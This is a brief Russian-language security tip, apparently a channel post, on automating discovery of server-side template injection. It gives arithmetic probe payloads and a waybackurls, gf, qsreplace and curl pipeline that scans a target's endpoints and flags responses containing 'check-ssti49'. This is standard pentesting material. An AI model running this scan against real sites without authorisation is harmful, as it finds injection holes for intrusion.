🔗 Автоматизируем поиск Server-side Template Injection (SSTI)
Для начала, сохрани эти полезные нагрузки в файл
#web #ssti
Для начала, сохрани эти полезные нагрузки в файл
payloads.txt
(можешь добавить свои):check-ssti{{7*7}}[[1*1]]
check-ssti{{7*7}}
check-ssti{{7*'7'}}
check-ssti<%= 7 * 7 %>
check-ssti${7*7}
check-ssti${{7*7}}
check-ssti@(7*7)
check-ssti#{7*7}
check-ssti#{ 7 * 7 }
Затем, с помощью waybackurls получаем конечные точки нашего сайта и выбираем наиболее подходящие для SSTI с помощью gf:echo target.com | waybackurls | gf ssti | anew -q ssti.txt
Создаём список конечных точек с полезной нагрузкой в качестве параметра:cat payloads.txt | while read -r line; do cat ssti.txt | qsreplace "$line" | anew -q sstipatterns.txt; done
Запускаем команду для проверки ответа сервера на наличие SSTI:cat sstipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"check-ssti49\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"
#web #ssti